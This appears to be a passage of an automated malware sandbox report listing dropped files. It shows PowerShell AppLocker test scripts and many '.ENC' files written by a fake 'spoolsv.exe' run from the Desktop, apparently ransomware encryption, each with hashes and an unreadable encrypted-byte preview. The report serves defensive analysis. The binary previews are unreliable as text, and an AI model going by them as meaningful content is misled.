                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f0uje4jr.0eb.psm1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jr31b4wh.hwi.ps1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nljo5hdr.1er.ps1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q31fncj3.1pd.psm1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_utp0vdmj.puy.psm1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vqjlnt4k.gzw.psm1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w42sowqf.ffo.ps1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_w4wjhbjh.524.psm1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wm2bnijn.dpn.psm1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbmlstqf.woz.ps1

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):60
                                                                                                                                                                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16608
                                                                                                                                                                                                                                                      Entropy (8bit):7.987783978235566
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:cWjWiJQSqjpKdj6Xcip1lX/F0tqLEB2GzbTI:7jH1qwZwftqtB2AbE
                                                                                                                                                                                                                                                      MD5:7902786B8D90D984EC5520A783282BCA
                                                                                                                                                                                                                                                      SHA1:3191BBC5D93BAB26DAEC2C16026A11D1A2630045
                                                                                                                                                                                                                                                      SHA-256:F7C1162FCC1CE14A52FEAB71E1733C26B1F0DF7C49C19B6F765EBCDDE55CD3BF
                                                                                                                                                                                                                                                      SHA-512:598AE0464359C0734B8A56123B9ACA0E826D8D59B1B4272FCED859AD30AAFD5B2DB8180A7D0FB288C43F19274BE5DA4AD0EDCFA8B9C7D6B2A6FBF95FACE8167B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.".zN......+...Y.yQ.7!..tV:o......c%.@.."....V._.)G.Y]...W.4...........c..vX.....K..S...I.!..6..;.."....N\...5.......{.n......$.B.:..6.dv....*.....u!ar.n.......c...b...C...J(W..A.......keRZ.-..r]....$..}.....6@...E....?.O..H.T.y.....9A.#.k.w]..DM.Lm..<.W0.q.k.Z.c..m5.....hS.P!ZA..JI.............6.4n.]....(T...1gL~..#........y.c....7~fW..Ru..\*W..C3.:W...V.f..P...+.@...{Q.l....`*.^n.'..|.....}.......#e6b....'.GC=...1M....y.n... :.>.}H..xL5.k......%S.> .. jB.%d.O.. <...L.;..6..o9G.MC.....|F......a.....u.k......&k.|.P...+E/..X.tO.m.aa.....i...t..2.,Q.c.C5+...+..Sg.x...k..P..n....+<......0^...,..i.....F...&{...<hM..gk..wV.D....h.......*V.H}..A.M7W.,D...-..,6.....S.:..e-S.0...P.`....3.+..1.......B-.&8-Cv.. B.Lr...I....FDB.!......._.............z.[..<.....Y.L.'y..6.C......P....q....i..N.T...!"..'....H.AA..{.....<I....d.f.aZ;..XSE...:..A.LL.....*..&."(..z...k.8..S'rDy..(.2._2..V...C9...0,.^#.)...9x.e.+5s.[.:EZ...eQ9z.HZ.....UhLs.hz....M

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):29856
                                                                                                                                                                                                                                                      Entropy (8bit):7.9933685589170045
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:768:LZN42++MnDkJdswhfnyZ++WPw8MJzxsmK4eeo:Fd+CdkZ+xq9xhK4U
                                                                                                                                                                                                                                                      MD5:09F57B5C0737CBCC38EC930C5837D00F
                                                                                                                                                                                                                                                      SHA1:0DD39840BCEC3837055A07093745AF665CBADB76
                                                                                                                                                                                                                                                      SHA-256:60D755CBB54F952E63A5CC3768A14F93C5E4A2370EC0B0AB6C3E75E50A2E8298
                                                                                                                                                                                                                                                      SHA-512:76CFF71DEBD8BD3FDEAC8A7FA5F0CDAEFE10BAC5B7DCA99A5356A9CD578166671C135F399300455D766EC5BB5DCF320BD019FC66D17C9D9AEE22AE4D9156409B
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.....4.GQ.I..Q..B,Qz5..(.....gT{.,N[^...@..I....=c.+l.S.{r..V....T.0...#.v57.^.,)^._......O.^=>...W.{........|...2j..L.WK.....#9...+.E..w.'Y......F..-...6.P..$(.%.....~.$.Y~..c..X..2......b:wU..M7.......Bg.;....K...I02'8....{...jK8.).p0..BA.U...3k.._.v..s..,.}..*v....z..e../....f.h.".L...-#)Z.Bl.CT]k..;...!.....e.s.X..........].E..}.....O}.<.u.6.....Y...x..OdJER..,....../$[iv.k..N..._6..C.E.S....,y{.q..sx..T.g7...4....|.i6....#`.1.&..u.V...6l..q..3\...~..#..$.I........4......@[..\..}.M....-eq.3.ol.?"b.1..~...jg......t:.f.>.O..M..s79e!zO.t..cwkD.F.Y"#..#....KOl.)....).o%O.........q.|.A....G........\v..?N+.#."C........=.o}5...h.U/..i...C..-..{.I9.g"_......EI,_R..o...Bw.....?.\....b.....&.e...q.}.f`.......6..r .a..)M..e......Y.e\......D/.~.o.4uG......S.#..T.rGZ}.7Q........b.....)......?...'........).......?.. ..-.q<.>..0o+N..:..S:7 ........XpM.......x.>....[.D..,...s.X..X.........Z.aQ..bq..T...%.,.,......P.c....[c.61C..._.>..`..k*.d.........h..4

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\chrome_installer.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2960
                                                                                                                                                                                                                                                      Entropy (8bit):7.936234956479136
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:MUozxk/RTaYXl//65cIqM3OZMcEk+/ocXFh0hGsR9ObDMj8d/DLae7An4l2vq97p:4ORTaKiagkfvWVh1sRYIwd/DLaWH97qq
                                                                                                                                                                                                                                                      MD5:3D10FF3A69251BA8AE22E6582FEE938C
                                                                                                                                                                                                                                                      SHA1:2582894D53A75ADC0CD4DB53BF12EEAC15389E19
                                                                                                                                                                                                                                                      SHA-256:ED2C42317C0C2CF3DC0D8B163D8EAE9A9A83B2FD16FBFDCE68D145D7F0E18B93
                                                                                                                                                                                                                                                      SHA-512:8D98B244D116F64C3C8610A5348880D464407CABC4856FBD30903E946AF60319F15B6AFEC603C84B43FCB74C7FCA0B8CA8347DF192B2C9AF921022BD559FED0B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.........C1.........&d.I.N#..Z..X(A.....X.qb....4.)\.v.~...&gh.?.....P"k*J.R.{\...K......h]4..T>Z.#...Q%..,B...f0..s(.I,0.~.........O...../. .myO.*.p+Y._.U.....0.)O?I9F..|....b..2...S`...a...c..a..&....gr.*L.....].. .S.dG6...).E...#`.t...&...w.51....i.\.m.n...ER.Eu...0..(.....0~.@.Z....g....z.YX...Z......~...}.X...|..U.^>.\..MG.d............K.\..S...Mwg.-].y...PVT.\../Y......)..[..._.?.N.{..A..<a..`[..l....E..&.w\.HR..}.......]Y..0..4r.z..y!).........=.F...0Fv.-C..)C~.M.B.(...Vx.w..V.KO=<.....[E.X..r......Y.....-..b=oF....H.../... z.\........-r..&g.?o....8....e..!~...~a...3...%.."........5...q..&".{..^.oH:g.wC...._..MB.7#.!k..j.|..P{...Vu.i.tt+..}..r.^Jh.3:.....DQ....3......E.;P ....g)..~l./=...N..E..h.&..Rob ..>1...<.:........&..d.A.}./.q-7. bZ.D[ou..a.E.2.y...9)..0.}G.HW.......C-n.....O...mK....4......./;...H.....`_......x)..;...c..y.\|6..+....o..;3{.#..,.1..Q2.C.e.:.8h.<Y....N......v.|e}L.I..e.'./.....BGD.f..;:......<r.../O.....HZX..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_1042373222\376d5b20-4ccf-4ab3-92ec-d2fa66fb039b.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):4816
                                                                                                                                                                                                                                                      Entropy (8bit):7.964615954848981
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:HUJxM9IXQHWOR5FtICkYaPiKPcdpcqi+AbZbYkUIJCWLoXv1+exQ:AxM992OjMHoiNO8MXv1Pq
                                                                                                                                                                                                                                                      MD5:ECE8603D95ED1411E08D08AA830B2307
                                                                                                                                                                                                                                                      SHA1:DE141BAA65EE9D2477D6BEB13068705F842A6641
                                                                                                                                                                                                                                                      SHA-256:09B58FEC1886D35DAAD2681A84F57065CFC82D3A079A7E83DF94B68379F3E67F
                                                                                                                                                                                                                                                      SHA-512:30059BEEE2031846F6ADDBA3748616C8C750B637DC9F81A4BA257E7D17A19603F880DE4FB7CE1D162DA6B21FAB4E2EAA8B641868D88F08589E0E6F88434B4712
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}B.6.j.X+...j...x.-...9...Q=...\.g..%..,.,8....._.v..NTg>. e.{..=.{QZbg..*.G.1;...K.A..4Kt>.....d..h.P&.....*O%...9.(...4...../.N|K...w3.&...{zWy.~O..0].:I.....d..$..mVz.t.<...*D|H9d<.).l.j...i.K....B..E.RW.r.O<....|.....'.\.y.?..|d..Y.M~......f...%.....&.QC..X.......(.a..>....h.*...8!n.(..l,........$.f.8.+hsi.........cd..qX.Ek0,.......8.. ..s...$@}..=.PQp....x..Q...Qh.9..{..c.z.?."..\.x.X...C.,bf.}*.^R.wn..*g....?..ie......HB..M..U.v.X...D...:l.@"..J.;.Y..`.6.d..q.. .j.]o.q.....R.Y|..h...=.F..n.:S.S`.!Vm...K.J..^Y"..^......$.....[3...\k....JH~....}Vy....I.JU....'.A.S...........C..kEQL..yHU.*..iK.m/..;Jj.C.nb.!.JP.!...|>z..yQ...I.a...(.A.!pY.._......@...t..A....hY\L.a..*F...iRX_.6.<.7..Ou........aeW..^.."..x..G.hMSnK."....EcV..&...e..8.._N..C0..._[....zY^....W)!c.7.....}I.|.|k.<.h.!...=....\.:=Cc%....[..Q@&K.:.......g.1&ie.z.G...RtN.....z.;.q....X....7.....F(..l...Img... (...w.r....-...eQT/..Z.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_1077422325\4643befd-79b8-4e0c-a2fb-c0e3ee78dcd5.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2256
                                                                                                                                                                                                                                                      Entropy (8bit):7.908662823747907
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:KG65yVypTUd38TI3hxTH0yZKVKOSKwSiVqHv/LpjALTAi57:u5yXd38TIAyZKVnVigvjxAYi57
                                                                                                                                                                                                                                                      MD5:15093D5BB6D8E40308B500693511ED40
                                                                                                                                                                                                                                                      SHA1:922DED6EAE52FE7FEE8A72FCC1A3DC36191FF58D
                                                                                                                                                                                                                                                      SHA-256:E9B40E4A4A463A4182F77D22CE269332F9E3AB744283AEF8010EA50CC95B1481
                                                                                                                                                                                                                                                      SHA-512:A174AB0E6C736383EA06471C80C92EDA458C1C202AB2CC185BC4A38379A9D27B4A6C74F6782C27D771331529412AC15FF1946961C982956B5BCB2A526CE1C0E6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.n..7}..r....D..m7..Q`.Q<[.2.L.....dQ..yT....}D.$f..45.b..yA3\|...4.9.<..L..S_.6.C..A.f..2n4T.y.-0;...u(.....q...<.H....LL.h.ws._.%)....J([3../.&..P.....g...x....9...N...u..V.1(G2|./{.'..r.x.(EW.W.q.....A.(sG....b..Q.g....N3J"...W...xU;.D........[>y...L..oF~......"..&H..e{...:.j....s.W....O-...\.8.....Mv....1:.....n..r......{.],.$.:.b.?....bs.A../=9F.........+.(./_...u...*z.x.n.J. ...#o....p.Y1-..''....Ou...T.XF7..F.@.."......x=...h.PoAj...C..@.&.....u..-..:.m...A.k+..."w R..3...x.s.....I.9..DML./+C#.a7....&v.....2.PT.....J..L...`X.w....k./LX...%..oF*x6...k..Y_k.. ...c.E7{j.........."....8.{@..}l..Q..B...f..a]X,.j.cO...]oZe...u...:..z..7Z... '.....o......@_.b...B}K.-S.g8.z%.)*...o.Q\.V..bJ|..r:.%m...g.E`QG|.4..u....WOD....iQ.U#...y..'l.....dV.........4.=.......L.}...9.....B........Y..d....0...._...g.t..JB0.W...:T..oo..0.>.M5.....bR..N...JTM./.....e...."yfRD.L^n..X..z,D..7J&Y@1.i.!..bbsoUX...!....K|%.+.r.e....? 4k......*=R.M..r.RkG..(ey..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\edge_BITS_3244_1097730144\873489b1-33b2-480a-baa2-641b9e09edcd.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):22768
                                                                                                                                                                                                                                                      Entropy (8bit):7.991513523217052
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:384:O5EYvbgA4kaRhblO3CKoN5m+cQs1uHVEzpMqvcBZdbqZ3eO7mE3oG6KWkMEx++:O5EY8A4kaR9lSY5mus1aVEVMqvcfRE31
                                                                                                                                                                                                                                                      MD5:3364390B5EB0E698F29C20591E9CBAC0
                                                                                                                                                                                                                                                      SHA1:41AF5AF9D7685649389161CE2DCD0A80456E2A34
                                                                                                                                                                                                                                                      SHA-256:0D8A0BEEE9AC53A99E3C068BB1AB43CFFF18B2544D4A188CACC496C57E090B1F
                                                                                                                                                                                                                                                      SHA-512:3657DF0CB8EA5CF2468679AF7A1D26D2C65F2B8C2ADC742567F08CEEC3681F929A2A729E203899EE15ECCE8EF58C44B1A8EE88587DEFC4FF337581E3FCD3E50C
                                                                                                                                                                                                                                                      Malicious:true
